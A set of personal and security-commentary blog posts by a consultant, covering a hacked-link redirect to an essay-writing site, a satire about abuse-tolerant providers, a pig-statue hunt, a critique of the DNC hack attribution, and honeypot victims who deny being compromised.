set-cookie: laravel_session_speedypaper=eyJpdiI6IjJWUVcybEZzd3lxN1dHXC9JNXIzckh3PT0iLCJ2YWx1ZSI6IlZ2dGVwN2VXM2RyYU1ob1pTN3JTenJkK3dCYkFZYnY1OUU0bVdpTEluS2VHUjBlWlZYTngyd1wvUHR2OG1Fanl4TjdrM25LXC9LUFIyS0hEZU1qVG5XdUE9PSIsIm1hYyI6IjhkOTViYmFiNjcyMjIxODkxZDU1ZGY1OGUyZmE0MzkyOTY1NjQwNzFlMDkxOTQxMWNlODk5YTgwYTQwZGI3OWYifQ%3D%3D; expires=Thu, 08-Sep-2016 18:32:49 GMT; Max-Age=7200; path=/; httponly
set-cookie: spv=eyJpdiI6IjVLZGVlSFU0bTFvdDNPMXJcL0gxUUJnPT0iLCJ2YWx1ZSI6IllFZTI0Z0FuS3h0djZwc1ZNZ3BJWEE9PSIsIm1hYyI6IjRlNzE0ODQ3NmY2NTA3ZDhjZGU5ZDUyYmVhNjgzZWNhYTNjMDc1NjlhNmM0NGMwZDQ4YTUyYjgxMGVlMGU4OTUifQ%3D%3D; expires=Wed, 07-Dec-2016 16:32:49 GMT; Max-Age=7776000; path=/; httponly
set-cookie: spvis=eyJpdiI6ImQ0bkJvb0hHcWVpeGFzdjN4V1JLeFE9PSIsInZhbHVlIjoid3lRY3lHbndTTFFGbjhWWlQwRnY3dz09IiwibWFjIjoiNWJkM2E1MjUwYjcyODY0MjY1YjcyYTJjNmYxNjJkOTczY2RmOTY4MTI2YzZiMDU1NjAyZWQxZGU0YTM0OTA1NCJ9; expires=Wed, 07-Dec-2016 16:32:49 GMT; Max-Age=7776000; path=/; httponly
x-prerender-token: fbDlD1S9rFH3au9KfiDK
strict-transport-security: max-age=63072000; includeSubdomains;
x-content-type-options: nosniff
server: cloudflare-nginx
cf-ray: 2df3cc76e7612597-ORD

GET https://speedypaper.com/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dee0a566f25b25cba8a72327465573e201473350225; spu=eyJpdiI6InE5S001V0F4NnR1VFF5OEQ5eE5KQ3c9PSIsInZhbHVlIjoiMlFpaWQzY3BnY0VMNTdQUWY5TlwveXc9PSIsIm1hYyI6IjJkNmU0ZjM3ZTQ1ZWQyY2I3ODRhZDExZWJlYzA4OGM1YjgwM2EwMDQ0ZTRlYzA1MzU1MTRjMjRjYWIzNTM2MTkifQ%3D%3D; laravel_session_speedypaper=eyJpdiI6IjJWUVcybEZzd3lxN1dHXC9JNXIzckh3PT0iLCJ2YWx1ZSI6IlZ2dGVwN2VXM2RyYU1ob1pTN3JTenJkK3dCYkFZYnY1OUU0bVdpTEluS2VHUjBlWlZYTngyd1wvUHR2OG1Fanl4TjdrM25LXC9LUFIyS0hEZU1qVG5XdUE9PSIsIm1hYyI6IjhkOTViYmFiNjcyMjIxODkxZDU1ZGY1OGUyZmE0MzkyOTY1NjQwNzFlMDkxOTQxMWNlODk5YTgwYTQwZGI3OWYifQ%3D%3D; spv=eyJpdiI6IjVLZGVlSFU0bTFvdDNPMXJcL0gxUUJnPT0iLCJ2YWx1ZSI6IllFZTI0Z0FuS3h0djZwc1ZNZ3BJWEE9PSIsIm1hYyI6IjRlNzE0ODQ3NmY2NTA3ZDhjZGU5ZDUyYmVhNjgzZWNhYTNjMDc1NjlhNmM0NGMwZDQ4YTUyYjgxMGVlMGU4OTUifQ%3D%3D; spvis=eyJpdiI6ImQ0bkJvb0hHcWVpeGFzdjN4V1JLeFE9PSIsInZhbHVlIjoid3lRY3lHbndTTFFGbjhWWlQwRnY3dz09IiwibWFjIjoiNWJkM2E1MjUwYjcyODY0MjY1YjcyYTJjNmYxNjJkOTczY2RmOTY4MTI2YzZiMDU1NjAyZWQxZGU0YTM0OTA1NCJ9

Now, the last time I called out SpeedyPaper about the “happenstance” of hacked links leading to their site, they boldly proclaimed their theory that these links were created by their EEEeevil Competitors (Note: Likely the self-same EEEeevil Competitors that they appeared to attempt to frame by clumsily redirecting their redirect to… if that makes any sense.)

So, let’s look at this whole redirect thing a little closer:

My initial request went to the upmd.org (University Park, MD) domain:

GET http://www.upmd.org/index.php/lead-research-paper/

The upmd.org site responded to that request with a redirect:

HTTP/1.1 307 Temporary Redirect
 Redirect to: https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=upmd.org&utm_referrer=http%3A%2F%2Fupmd.org%2Findex.php%2Flead-research-paper%2F&utm_keyword=lead+research+paper

There’s some awfully specific stuff in those parameters:

• rt=3S5do2ix
• utm_search_engine=google
• utm_host=upmd.org
• utm_referrer=http%3A%2F%2Fupmd.org%2Findex.php%2Flead-research-paper%2F
• utm_keyword=paper

First off, what’s with this “utm” stuff?

Well, to answer that question, we need to time-travel back to the late 90’s. UTM originally stood for “Urchin Traffic Monitor,” which was part of a software suite called “Urchin WebAnalytics Software” that was released way back in 1998. Google purchased Urchin and its technology in 2005 and continued to sell the software for almost seven years until the decision was made to discontinue it in 2012. Although the original UTM software has gone the way of the dodo bird, Google still continues to use the “utm” convention for its own analytics software.

But this ain’t Google’s doin’… Somebody seems to be - GASP! - plagiarizing Google’s work. If only we could figure out who in this sordid mess knows anything about plagiarizing…

The “outlier” here is that “rt” parameter… Perhaps (and I’m speculating here…) whoever did the deed and placed these hacked links ‘round the ‘Net is convinced - through no fault of the fine, upstanding folks at SpeedyPaper - that they’ll be somehow “paid” based off of some sort of “referal token.” Nah… that couldn’t possibly be the case.

So… at this point, something on the SpeedyPaper site receives that inbound URL, doesn’t seem to be the least bit befuddled by the string of goofy parameters (hmmmm…), sets a bunch of cookies (hmmmm… hmmmm…), and immediately redirects back to SpeedyPaper’s main page. How convenient!

It seems especially convenient when SpeedyPaper has, in the past, made it perfectly clear that this is the work of EEEeevil Competitors. Obviously, EEEeevil Competitors often hack websites and install links to your site, complete with analytics parameters, because that’s how EEEeevil Competitors work.

It’s so convenient it’s essentially a frickin’ miracle.

Screw this crap… I’m gonna go watch my mouse jump.

(Yes, that sounds like a euphemism. No, it isn’t.)

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
September 8, 2016

The following represents an unedited transcript of remarks by Jake “The Mortar-Man” Mortman, CEO of “Mortars-R-Us,” at a hastily prepared press conference responding to allegations surrounding what has come to be known simply as “the incident.”

Yea… hello…

[clears throat]

Can everybody hear me?

[clears throat]

[taps microphone]

[background conversation - mostly unintelligible, except for someone telling Mr. Mortman to stop tapping on the microphone]

Ok… I called this here gathering together sos I could answer your questions and clear the air about some of the stuff that’s being said about my company, Mortars-R-Us - Where anyone can shoot a mortar™ - Come on down today ‘cause we love seein’ customers INCOMING! [chuckles]

Well… maybe it’s a little too soon…

Ok… I don’t have no openin’ statement to make on account’a my attorney tellin’ me I shouldn’t. So, howsabout I take a question… Ok… You there. Yeah, you… the broad… I mean “lady”… in the front row.

[unintelligible]

Dangerous? Fugget about it… Dangerous smangerous… Our business ain’t dangerous. It taps into the desire of every red-blooded American to come on down and… you know… shoot a mortar. Just $9.95 a round… And, best of all, you don’t need to know nothin’ to try it… you just aim it however you feel and let ’er rip… we call it Vector-Proof Shootin’ or VPS for short. Dangerous…? Hell… if givin’ people a mortar, some live rounds, an’ lettin’ ’em take it out back an’ fire it… well… wherever is suddenly all “dangerous,” then I don’t wanna live in this country no more…. Next question.

[unintelligible]

Yeah, sure… if you want to go way back to last year, sure… you’re gonna find some “safety incidents.” But that was at our old location where we had a different kinda client. We specifically moved to our new location - next to the park and playground - because we thought it would attract… you know… a more “responsible clientele”… Next question.

[unintelligible]

Yeah, sure… I suppose in your perfect little rose-colored world, having some way where we could monitor to make sure that the mortars were being fired safely downrange would be a good idea. But this is the real world, and I can’t justify the kind of expense it would take to make that happen. I need to keep my prices competitive with them schmucks over at “Shelling for Dollars,” or I’ll be out of business… Next question…

[unintelligible]

Yeah… so what? You listen to me: as far as I’m concerned, just ‘cause six months ago a few shells landed in the park didn’t mean we needed to go makin’ all kinds of big changes to how we do things. I told those whiners over at Parks-n-Rec, jus’ like I tell everybody: you fill out our online form and send us detailed information and photos documenting the exact location of the craters, and we’ll take care of it. And let me tell you… once they finally submitted all uh’their info, I gave them teenagers who fired those rounds a good talkin’-to, and they promised me they’d be careful next time. Hey… they even sent the people what was in the park a nice condolence note about their dog.

[unintelligible]

Now you’re just bein’ ridiculous… How could I have seen this playground thing comin’… What, do I have some kind of crystal ball or sumpthin’? You’re actin’ like what happened wit’ the playground yesterday is somehow my fault.

[unintelligible]

Unsafe? I can’t see how I could make shootin’ a mortar any safer than I already am. I mean, when that dog got whacked, I even hired my sister’s boy, Sal, part time in the afternoons to work on makin’ things safe. So now, when we get a report of a stray round landin’ in the park or by a school or over in the neighborhoods, we guarantee that Sal will respond within 72 hours and tell whoever was doin’ the shootin’ to knock that shit off. Providin’, of course, that the online “abuse” form is filled out all proper-like… Next question.

[unintelligible]

Regrets? Me? Nah… I mean, yeah… those kids on the playground… that was unfortunate. But it’s not like I can see how anyone can be blamed. I mean, my customer feels really bad, but sometimes these n00bs… well they just end up shootin’ in the wrong direction. What can you do, eh? And it ain’t like it’s all his fault, ya know. Those kids… well if those kids hadn’ta been standin’ right there, ya know, playin’ and all… they wouldn’ta got hit. So I’d say, roughly speakin’, the blame is about fifty-fifty…

[unintelligible]

Do I think anyone else is to blame? Nah… I don’t see how nobody else could be at fault here…

[unintelligible]

You think Mortars-R-Us is to blame? Hey! I’m a legit businessman providin’ a legit service. If people misuse that service - either on accident or on purpose - that’s on them, not me. Besides, we got a form that people can fill out if there’s a problem…

[unintelligible]

“Inherently dangerous.” What the hell is that supposed to mean, Mr. FancyWords? You think since I’m providing my clients with mortars that I’m responsible to make sure no stray rounds leave our mortar range? What kind of dumbass namby-pamby are you? You ever run a mortar rental service? You ever deal with the kinda shit I deal with? You think I’m supposed to provide mortars AND somehow keep these people from blowin’ up random stuff? Ha! You don’t know nothin’ ‘bout nothin’.

Hey Sal… why don’t you show all these guys how our security protocol works…

[The press conference erupts into a cacophony of swearing, thuds, grunts, and the sound of chairs being thrown. One voice can be heard shouting over and over, “Knock that shit off” before the tape suddenly ends.]

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
September 7, 2016

It all began back in February 2014. At the time, I was a consultant for InGuardians and I was assigned to do five days work, onsite, for a client in California. Because spending a few February days in California unquestionably trumps spending those same days in Northern Illinois, my lovely wife Karen decided to tag along for the trip. I warned her that I would be working and that she would need to find something to occupy herself during some pretty long days. Karen allowed as how she was sure that sitting by the pool in the sun would keep her happily occupied.

Then, the cold snap hit California.

Where the average temperatures that time of year normally hovered in the upper 70’s and lower 80’s, they plunged to the low to mid-60’s - certainly not pool weather.

Karen was, however, a trooper. She didn’t complain (much) and managed to keep herself entertained as best she could. As the week wore on and the weather continued to be uncooperative, her options for things to do during the day started to dwindle.

Thursday evening, I got back somewhat late from the client’s site. It was already dark, and I was feeling a little guilty that she’d been waiting for me. As I changed out of my “work clothes” so we could go to dinner, Karen told me about her day. She said that she had made dinner reservations at a restaurant in walking distance and - more importantly - there was something on our walk that she really wanted to show me.

“What did you find?” I asked

“You’re going to laugh at me,” was her response. “I found the cutest pig statue ever.”

“On our walk” turned out to be something of an exaggeration - it was actually in the opposite direction. Fifteen minutes later, we were standing outside of a restaurant I’d been to many times before (I’d often done work for this client). Somehow, I’d never bothered to notice what my wife had seen: just outside the front door there was, indeed, a pig statue.

As pig statues go, it was nice, but to my eye it wasn’t quite “we-must-make-a-pilgrimage-to-visit-the-pig” nice. My wife grew up on a farm, and her father - at one point - raised pigs, so her love of pigs, and especially “cute” pigs, likely far outstripped mine. In the back of my head, I was pretty sure that desperation for California cold-weather entertainment was responsible for this fixation.

It was a few weeks later, when I happened to overhear her talking to a friend on the phone. We were back at home and she was recounting details of the trip and sure enough, I heard her talking about the pig statue.

“No, seriously… it was absolutely the cutest pig statue ever.”

“Ok,” I thought, “I’m going to have to get her that statue.”

And so, it began…

Now I wasn’t necessarily going to get her THAT statue. I mean - if the restaurant was interested in selling it, sure… I’d get that one. But I knew by looking at it that it wasn’t a one-off. I’d just find another copy… somewhere.

Oh, how naïve I was…

I called the restaurant that day, and left a message for the owner - telling them that I was interested in the pig statue and asking them to call me.

Nothing.

Perhaps “I’m interested in finding out some information about the pig statue you have outside,” is a little weird for voicemail. I called back, got the owner’s email address, and sent them an email laying out my lovely wife’s obsession with “the cutest pig statue ever,” and asking them for information about where they’d gotten it.

Nothing.

In all, I sent about a dozen emails and left about dozen voicemails over the course of about a year and a half - contacting them at least once a month. The owner never seemed to be around whenever I called, and they never responded to my emails - so I pretty much gave up finding anything out from them.

I took to Google’s Image Search, using various combinations of descriptors with the term “pig statue.”

I’ve looked at hundreds (perhaps thousands) of pictures of pig statues.

(Go, right now, and do a Google Image Search for “pig statue.” I’ll make it easy for you - click here. There are LOTS of pig statues. Angry pigs, happy pigs, pigs with wings, pigs dressed in clothing, fat pigs, skinny pigs… pigs, pigs, pigs. There are a LOT of pig statues… just not the one I was looking for…)

I also looked on EBay, which seems to have a never ending supply of new and different “pig statues” cycling through their platform. Apparently I’ve somehow greatly underestimated the world’s appetite for pig statuary…

When I made the move from InGuardians to Warner Brothers, I found out that the WB “Mill” can, essentially, make anything - and they’re available to do work for employees - for cost. They’re the folks who make the sets, props, etc… for movies and TV shows, and so they have amazing capabilities. Because most of the stuff they make for filming just has to look good, most of what they make is… well… good looking crap - but they’re true artisans, and actually enjoy making “real” things for employees. My old boss, Ron Dilley, did some leg work for me (he’s gone through the process before and had an awesome piece of furniture to show for it…) and got an estimate for the cost of making a casting of the original (if I could get the folks at the restaurant to lend it to me for a couple of days - a dicey proposition at best, since I couldn’t get them to even talk to me). When Ron told me the price… well… I love my wife, but let’s just say that there are limits.

Around that same time, the original client did something huge. He’s actually a close friend, and knew that I had been trying to get information on the pig statue. One day, he had stopped in the restaurant for lunch and - perhaps the stars were perfectly aligned - the owner was there. He basically cornered the owner and told them that his friend really wanted to know the provenance of the pig statue. Long story short: before he left, he had the name of the place from which the owner thought it had been purchased.

At this point, it had been over two years since Karen had originally seen the pig. The pig hunt wasn’t constant - I would usually “spin up” once a month or so and dig though a few hundred listings on EBay or throw some new term at Google Image Search and scroll past a couple hundred new photos - but it was starting to seem futile. Now, I had a real lead.

I called the place - it was a high-end gardening, pottery, and “found items” shop - and, essentially, they laughed at me.

“A statue of a pig? I’m sure we’ve never sold anything like that.”

Square one.

I sent emails to the addresses on their website with a picture of the pig. The dude on the phone seemed to be way more snooty than someone working in a place like that should be, and I hoped that my email might reach a more down-to-earth person who would actually check.

Nothing.

I found this latest dead-end very frustrating, because - despite snooty dude’s demeanor, looking at their website, it sure seemed like a place that would sell a statue of the “cutest pig ever.”

That’s when it hit me…

CeWL - DigiNinja’s Custom Word List generator is a tool that I’ve used in the past on engagements. The idea is this: you run CeWL on a target organization’s website and it extracts a list of words that are specific to that organization. You then use those words when you’re attempting to crack passwords or brute-force accounts. It’s surprisingly effective.

If snooty dude’s website painted the picture of a place where I would likely find the pig statue, maybe if I used some of the same kinds of descriptive words they used… if I seeded my Google Image Search using those terms (along with “pig statue”)… I might have better luck. Not that I was actually going to run CeWL on their website… but you get the idea.

“UNIQUE GARDEN PIG STATUE”

It was about the 5th new combination that I tried. The other four attempts had come up empty, and I was feeling a little dejected. As I scrolled through hundreds more images I wasn’t expecting much…

SON-OF-A-BITCH… THERE IT IS!

As it turned out, the words “UNIQUE” and “GARDEN” were the key, because the “cutest pig statue ever” is a product of Unique Stone, Inc - purveyors of antique and garden reproductions in Rockingham, NC.

My tenth wedding anniversary was coming up, and somehow the search engine gods had managed to part the clouds standing between me and the perfect anniversary gift.

I called Unique Stone and ended up talking to Amy, a very sweet lady with the thickest southern accent I’ve heard in a long time. I told her the story of my search for the “cutest pig statue ever” and explained that I wanted to purchase one.

It turns out that Unique Stone isn’t in the retail pig statue business (who knew?) and generally sells only wholesale - in large lots (i.e. like 1000 pieces). Given my long search and my story, Amy (who - as you’ll see - has the patience of a saint) was willing to sell me one. The only issue was that they weren’t really in the business of shipping individual statues… they were geared for shipping truckloads. I told Amy that if she would sell me a pig statue, I would figure out a shipping method.

As we talked through the purchase and I gave Amy my address, she asked a rather odd question:

“McHenry, Illinois… is that anywhere near Gurnee?”

Yes. Yes it is.

It turns out that Amy and her husband were planning to drive north to Gurnee, Illinois for her nephew’s high school graduation in a few weeks. If I would be willing to drive to Gurnee to pick it up, Amy said she would be happy to bring the pig north with her. Southern hospitality is a very real thing.

There was only one hitch: she was coming to Illinois for her nephew’s high school graduation on the same weekend that I was heading to Memphis for my daughter Mary’s graduation from her Master’s program.

What’s the point of having lots of children if you can’t impose on them to do things for you? I called my oldest step-daughter Lauren (who lives nearby) and once again told the story of the “cutest pig statue ever.” I asked her if she could meet Amy in Gurnee that weekend to get the pig. She said she would. I gave her Amy’s number and gave Amy hers - the two of them would figure out a time to meet that would work once Amy was here.

Throughout the weekend in Memphis, I kept texting Lauren for updates. She allowed as how with all of the texting and meeting up with people in parking lots with cash, it seemed like she was part of a drug deal. The “meet” was finally set for Sunday during our drive home, and every time we stopped for gas or food, I would fire off another text to Lauren for an update. Finally, the deal went down:

Uh oh…

I asked Lauren to text me a picture.

Aaaaaarrrrrrgggggghhhhh!!!!

It turns out that Unique Stone had some problems with their website. Specifically, the pig I wanted and the pig I got both had the same part number and description listed on the site - something that no one had noticed until now. The upshot: Amy brought the wrong pig.

I called Amy the next week and explained the situation and she was more than apologetic. I had done some “recon” using Google maps and had located a pack-n-ship place in Rockingham, NC. Amy gave me the specifications of the correct pig, and I called and chatted with them about their shipping capabilities. It looked like a “go.”

Amy kindly credited me for the “little” pig and volunteered to drop the new “cutest pig statue ever” off at the pack-n-ship place. Once again, southern hospitality is a very real thing. (Note: Later, I learned that she carried the 90 pound statue into the store by herself. After going over the specifics with the high-school aged clerk, she said she had to laugh when he asked one of his co-workers to help him move it…)

By coincidence, the package was scheduled to arrive on the day that Karen and I were leaving for a trip for our anniversary. The UPS website showed that the delivery window was going to butt up against the time that we needed to leave for the airport, and I kept my fingers crossed that it would arrive on the early end of the window.

The night before it arrived, I had a dream that it showed up and was broken. I considered trying to distract Karen when the package arrived so I could check it first, but decided that there was little chance of being able to successfully pull that off. I was just being paranoid, after all.

FYI: That’s something that we, in the literary biz, call “foreshadowing.”

Sitting together on our front porch, Karen opened what was supposed to be a surprise anniversary gift (we had decided not to get each other individual gifts - the trip was our gift) only to find… well… several hundred chunks of the “cutest pig statue ever.”

(Note: The pig was the item, broken in transit, that I referenced in an earlier blog post, Po-tay-to… Po-tah-to)

Fast forward to today…

This past weekend, I drove my daughter Maggie to Raleigh, NC where she will be attending Meredith College. After two years at another college, she wasn’t really sure she was on the right path and took a year off to participate in Mission Year - an urban ministry program focused on discipleship in (in her case) inner city Houston. After that, she decided to continue her education at Meredith.

A few weeks after she had asked me about driving her to school, a lightbulb lit up above my head. I looked at Google maps and found that Rockingham was only a two hour detour…

I called Amy again and asked to purchase two pigs for pickup. Why two? As much trouble as this dang pig has been, I really need to have a spare.

This picture is two and a half years in the making. In it, you’ll see the “cutest pig statue ever” sitting on our front porch… right where it belongs.

I said that this was a story about living life… but what did I mean?

I love my wife, and while a two and a half year hunt for the “cutest pig statue ever” may seem crazy, it reminds me that while you may not love what you’re doing at every moment, if you love the overall goal, it’s all more than worthwhile.

There’s always a part of the day-to-day minutia of anything we do that’s dull, boring, or tedious. (I believe that “looking through pictures of hundreds of pig statues” is actually the archetypical example used to define “tedious.”)

Nothing worthwhile works out easily - but persistence has a way of paying off in the end.

And you know what? That pig statue actually is pretty darned cute…

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
August 16, 2016

“An extraordinary claim requires extraordinary proof.”

Truzzi’s quote, from his work, On the Extraordinary: An Attempt at Clarification, Zetetic Scholar, Vol. 1, No. 1, p. 11, (1978) echos ideas developed much earlier by various metaphysical philosophers. In his 1832 paper Théorie Analytique des Probabilités, Laplace wrote: “The weight of evidence for an extraordinary claim must be proportioned to its strangeness.” In his An Enquiry Concerning Human Understanding (1784), David Hume wrote: “A wise man… proportions his belief to the evidence,” and “No testimony is sufficient to establish a miracle, unless the testimony be of such a kind, that its falsehood would be more miraculous than the fact which it endeavors to establish.”

But it’s 2016. All that old sk00l thinking is… well… antiquated. In an era where 24-hour news isn’t so much about “facts” as it is about “engagement,” the world of Laplace, Hume and Truzzi is nothing but an irrelevant memory of a more naïve time.

And just when you thought that the American election process couldn’t get stranger, it does.

Much stranger.

This week, serious people decided to throw Truzzi’s maxim out the window and just go with whatever the hell sounded plausible. “Extraordinary proof” is so frickin’ boooooring.

Perhaps it’s just me, but the theory that Russia is attempting to overtly influence the outcome of American elections seems to rise to the level of an “extraordinary claim.” Sadly, I think that fact has managed to somehow become culturally irrelevant.

As for the evidence, I’ve seen nothing so far that rises to a level that gets it past the whole “beyond a reasonable doubt” standard that I think the media used to strive to surpass. It’s filled with weasel words (ex. “likely,” “highly probable”) and - even more damning - suffers from some unflatteringly transparent contradictions (ex. self-congratulatory phraseology describing the investigation’s ability to quickly work their way past the “superb tradecraft” of the intruders while simultaneously pointing out their apparent n00b-like “blunders” - leaving metadata in edited files, etc…)

There is an almost willful blind-spot on the part of the “investigators.” It’s almost as if you can hear them say: “Look at all of these blunders by the bad guys - it just goes to prove that we’re so much smarter, taller, and better looking than them… False flags? No. These couldn’t possibly be false flags. We know false flags when we see them (and we’re lookin’ at you, Guccifer 2.0). We’re so smart.”

Having been incorporated into the mainstream political discourse, this is pretty much a done deal. Russia did it. No questions allowed.

But I have questions.

Lots of questions.

Questions that can only be answered by the extraordinary proof that we’re never going to get.

-TL Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
July 27 2016

Addendum (July 28, 2016):

My friend Chris Sanders (@chrissanders88) asked me to “cite specific examples” of where I feel the evidence is lacking. Full disclosure: Chris works for Mandiant/FireEye. (I believe it is important to also note that, despite my constant urging, he has been unable to convince them that they should change the company name to FireAnt.) So… here you go Chris. I hope you’re sitting down - and while I’m happy to oblige, it’s important to remember, onus probandi incumbit ei qui dicit, non ei qui negat i.e. it isn’t MY job to make a case… ‘cause I’m not the one making the claim.

Note: Chris wasn’t saying I was wrong… he was just pushing me to develop my argument further. Also, I’m not saying that the overall conclusion (Russia did it) is wrong - I’m just saying that this is a lousy way to make an argument and, therefore, it teaches people to accept lousy arguments.

For the most part, the technical details making the case that the DNC intruders are Russian aren’t even available (see #1 below). So while I can point out problems in the details that ARE available, the bulk of my rebuttal will be based on pointing out formal logic errors in the conclusions being drawn.

1. First of all, we need to get this out of the way: Currently, the concept of “attack attribution” on the Internet has been slapped around and then held down and forceably violated by “OpSec.” Beginning with the Sony breach, we’ve seen several high profile “attack attributions” chucked to the media by shadowy agencies who can only manage to say “X did it” before tagging on “we can’t tell you HOW we know… OpSec.” Here’s the bottom line on that bullshit: Look up at the top of this blog post - “An extraordinary claim requires extraordinary proof.” If you’re going to make an extraordinary claim (“The Russians are overtly attempting to influence U.S. elections”) then you MUST provide rock-solid, definitive proof. NO EXCEPTIONS. Otherwise, keep your Goddamned mouth shut. Even if you KNOW FOR CERTAIN THAT SOMETHING IS TRUE if you’re not going to provide us with proof, STFU.
   • NSA/FBI/CIA: Stop this crap RIGHT NOW. Argumentum ab auctoritate wasn’t cool back when our parents told us “because I said so,” and it certainly isn’t cool in this context. You’re indoctrinating the public with an incredibly bad habit (“accepting assertions of authority”) and you need to stop.
2. CrowdStrike claims the attackers are highly sophisticated (“Their tradecraft is superb, operational security second to none…”) and yet we’re - at the same time - supposed to believe that the intruders were so stupid that they “accidentally” left metadata in released documents showing that the file was edited on a machine configured with Russian language settings by someone with a Cyrillic username (Феликс Эдмундович - “Iron Felix”) that references the dearly departed Felix Dzerzhinsky, one of the founders of the Soviet Secret Police. Another leaked document included hyperlink error messages in Cyrillic, the result of editing the file on a computer with Russian language settings. Sorry, but you can’t have it both ways: either the intruders have OpSec “second to none,” or they are the Moe, Larry, and Curly of cyber-attackers. CHOOSE.
3. One of my favorite conclusions: After the “edited-on-computers-with-Russian-language-settings” cockup became public, “the intruders removed the Cyrillic information from the metadata in the next dump and carefully used made-up user names from different world regions, thereby confirming they had made a mistake in the first round.” Or… not. Perhaps - just perhaps - you’re choosing to see “confirmation” of your foregone conclusions in the actions of an adversary attempting obfuscation. Perhaps you’re seeing EXACTLY what they want you to see.
4. Follow this chain of logic: Guccifer 2.0 claims to be Romanian. Guccifer 2.0 cannot speak colloquial Romanian. Therefore Guccifer 2.0 is Russian. (Technically, this is a fallacy of four terms or Quaternio terminorum in Latin.)
5. The intruders used the same command and control infrastructure that the Russians have used in the past, therefore they MUST BE THE RUSSIANS! Uh… no. They used hacked systems on non-Russian networks for C & C. Of course it would be utterly impossible for anyone else to use those hacked systems - they’re so… er… um… secure… nevermind.
6. Finally, and this is my favorite, see if you can find the formal logical flaw here: The DNC attackers used tools A, B, and C and methods X, Y, and Z. Russian attackers use tools A, B, and C and methods X, Y, and Z. Therefore, the DNC attackers are Russian. (Hint: It falls into the same category as this: Steve is carrying a purse. Women carry purses. Therefore, Steve is a woman.)

So if your biggest, baddest “proof” (#6 above) rests on a logical flaw (and FYI, it’s known as the “fallacy of the undistributed middle” or in Latin, non distributio medii) then really: What frickin’ proof do you have?

Addendum II (July 30, 2016):

I’ve had several people ask me, “Well, if the Russians didn’t do it, then who did?” Unfortunately, I think you’re missing the point here. I’m NOT SAYING that I disagree with the conclusion - I have a problem with the fact that there IS a conclusion with no real evidence to back it up. I’m saying is NO ONE HAS PROVEN ANYTHING, so let’s stop going around acting like they have. The media has taken this particular ball and uncritically run with it: AND THAT’S A PROBLEM.

This rant isn’t about Russia. This rant isn’t about hacking or attribution. This rant is about people being taught to accept extraordinary claims without evidence. People shouldn’t be willing to accept claims like this without adequate and compelling proof. Encouraging this type of behavior is dangerous and WILL have consequences.

A lot.

The thing is, I’m not entirely sure why.

The scenario goes something like this:

Someone’s computer gets 0wned. It really doesn’t matter how, and in most cases, I actually don’t know exactly how. It just gets 0wned.

The bad guys doin’ the 0wnin’ install some malicious software that uses the 0wned machine (and the 0wned machine’s bandwidth) to start scanning the ‘Net for other 0wnable machines. Eventually, the malicious scanning software finds my honeypot.

The whole point of a honeypot is that it looks incredibly 0wnable. Specifically, my honeypot system looks to be vulnerable to dozens of different kinds of attacks. When malicious scanning software finds my honeypot, the malware’s little digital salivary glands shift into overdrive.

And so… the dance begins.

The attacking software will try, over and over, to 0wn the honeypot. Remember, the honeypot looks vulnerable… but it isn’t. Sometimes the tenacity of attacking malware becomes a little ridiculous. I’ve had attacking systems continuously try to 0wn my honeypot for months on end.

Aside from looking like it can get 0wned six ways to Sunday, a honeypot has one other, very important function: it logs everything.

I look at those logs pretty much every day and dig through the attacks. I research the IP addresses of the attacking systems, and I try to notify the system owners. By far, the bulk of the attacking hosts on the Internet are machines that attackers have already hacked, so rather than tracking down the actual attackers, I’m tracking down their victims. Over the years, this goofy “hobby” has allowed me to notify hundreds (perhaps thousands) of system owners - delivering the bad news that they’ve been hacked.

Tracking down the owners of 0wned systems is something of a black art: IP addresses, for the most part, don’t have usable reverse information (ex. looking up mail.example.com always gets you the IP address 12.34.56.78, but trying to do a reverse lookup on 12.34.56.78 generally won’t get you back to mail.example.com). There are other tools to assist with this (WHOIS, etc…) but they’re all pretty limited. The upshot: tracking down system owners is a hit-or-miss process at best.

So even when I’m able to track down some information that indicates who owns a hacked system, I’m never 100% sure - I get close, but never 100%. My messages to system owners are always in disclaimer-speak: “If this is your system, you should probably…”

That’s where the lying comes in.

It’s happened several times over the course of the past few months. I’ll contact someone and lay out a pretty good case for them being the owner of a hacked system. Sometimes I’ll have used some special toyz (to which I’ve been given access) to actually figure out the DNS name of the box. Sometimes I’ll use some cool trickery to discover what the box believes it is called. No matter how I figure it out, before I contact someone, I’ll be reasonably certain about who owns the system (note: the “owner,” not the “0wner”).

So I contact them.

“Nope. We’ve checked. We’ve had other people check. We’ve asked strangers to check. We’ve asked all our employees. We’ve asked them to ask their friends and neighbors… and THEY’VE all checked. We went straight to the source and asked the horse and even the famous Mr. Ed is ABSOLUTELY certain: IT’S NOT OUR MACHINE.”

But somehow, magically, the hacked machine that’s been blasting my honeypot every day for weeks on end… just stops.

I get it.

It’s embarrassing when your company gets 0wned. Obviously, you did something dumb and a poor unsuspecting computer paid the price and was… well… violated.

But really…

Lie to your stockholders. Lie to government regulators. Don’t lie to me…

Just think of me like your mother: I always know when you’re lying.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
July 11, 2016

“Welcome to BLAH-BLAH-BLAH, please listen carefully as our menu options have changed.”

“Listen carefully?” The menu options have changed? Are they so gosh-darned complex that they need to be constantly updated? I grab a pen and a pad of paper, convinced that I’m about to be inundated with options.

“Dial ‘1’ if you know your party’s extension. Dial ‘2’ for sales. Dial ‘3’ for support and dial ‘4’ for our dial-by-name directory.”

Wait… what? Well that was a disappointment.

